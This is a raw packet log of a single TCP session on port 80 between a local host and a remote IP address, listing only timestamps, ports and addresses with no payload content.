Sep 27, 2024 00:15:14.615921021 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615933895 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615945101 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615956068 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615968943 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615971088 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.615983009 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615994930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615997076 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.616025925 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.616065979 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616085052 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616096020 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616106987 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616136074 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.616584063 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616595984 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616607904 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616616964 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616647005 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616657019 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.616658926 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616697073 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.616719007 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616730928 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616740942 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.616770029 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.616790056 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.617183924 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.617194891 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.617239952 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.695888996 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.695903063 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.695914030 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.695925951 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.695938110 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.695950031 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.695961952 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.695964098 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.695993900 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.696182966 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696197987 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696204901 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696242094 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.696242094 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.696350098 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696362019 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696372986 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696434975 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.696527958 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696538925 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696551085 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696561098 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696573019 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696576118 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.696595907 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.696611881 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.696655989 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696669102 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696680069 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696702003 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.696947098 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696958065 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696969032 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.696980953 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697000980 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.697026014 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.697124958 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697137117 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697149038 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697160959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697170019 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.697187901 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.697454929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697467089 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697478056 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697489977 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697504997 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.697535992 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.697609901 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697622061 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697633028 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697643995 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697644949 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.697655916 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697674036 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697674990 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.697686911 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697699070 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697702885 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.697736025 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697741985 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.697748899 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.697772026 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.700078964 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700090885 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700100899 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700136900 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.700263023 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700274944 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700284958 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700314045 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.700413942 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700427055 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700438023 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700448990 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700474977 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.700499058 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700510979 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700545073 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.700572014 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700577974 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700613022 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.700920105 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700932980 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700943947 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700957060 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.700962067 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700982094 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.700993061 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.700995922 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701009989 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701020956 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701031923 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701037884 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.701066017 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.701078892 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701091051 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701141119 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.701565981 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701576948 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701587915 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701597929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701608896 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701613903 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.701633930 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.701718092 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701730013 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701735020 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701745987 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701760054 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701767921 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.701771975 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.701795101 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.702346087 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.702358007 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.702368975 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.702380896 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.702393055 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.702423096 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.702488899 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.702539921 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.702553034 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.702559948 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.702586889 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.702950954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.702963114 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703002930 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.703110933 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703121901 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703134060 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703145027 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703155041 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703166962 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703174114 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.703197956 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.703216076 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.703862906 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703874111 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703885078 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703896999 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703907013 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703917980 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.703941107 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.703941107 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.703955889 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.704020977 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704034090 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704044104 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704056025 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704073906 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704077005 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.704087973 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704101086 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704109907 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.704113960 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704138041 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.704150915 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.704509974 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704549074 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704561949 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704572916 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704586029 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704598904 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704607964 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.704612017 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704622984 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.704631090 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.704638958 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.704664946 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.706150055 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.782299995 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782315016 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782321930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782380104 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782392979 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782399893 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782408953 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.782411098 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782460928 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.782573938 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782586098 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782598019 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782609940 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782614946 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.782641888 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.782771111 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782785892 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782823086 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.782859087 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782871962 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782882929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782895088 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782907009 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782915115 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.782918930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782928944 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.782932997 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.782955885 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.782974958 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.783127069 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783236027 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783247948 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783260107 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783271074 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783282995 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783293962 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783305883 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783324003 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.783324003 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.783324003 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.783327103 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783353090 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.783622026 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783632994 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783643961 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783658028 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783668041 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.783668995 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783682108 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.783683062 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783696890 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783705950 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.783710003 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783749104 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.783934116 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783946037 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783957958 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783970118 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783973932 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.783983946 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.783997059 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.784003019 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.784010887 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.784034014 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.784046888 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.786209106 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786370993 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786381006 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786392927 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786406994 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786417961 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786429882 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.786434889 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786438942 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.786449909 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786456108 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.786493063 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786494970 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.786525965 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786537886 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786550045 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786571026 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.786588907 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.786675930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786688089 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786700010 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786727905 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.786953926 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786967039 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786977053 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.786992073 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787015915 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787200928 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787214994 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787228107 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787240028 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787251949 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787254095 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787286043 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787425995 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787436008 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787447929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787458897 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787471056 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787475109 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787482977 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787489891 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787497044 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787504911 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787508965 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787520885 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787528038 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787533045 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787544966 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787559032 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787575006 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787596941 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787736893 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787750006 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787774086 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787786007 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787806988 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787884951 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787897110 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787908077 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787919998 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787930965 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787931919 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787945986 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787955999 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.787957907 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.787993908 CEST	49774	80	192.168.2.4	147.45.44.104
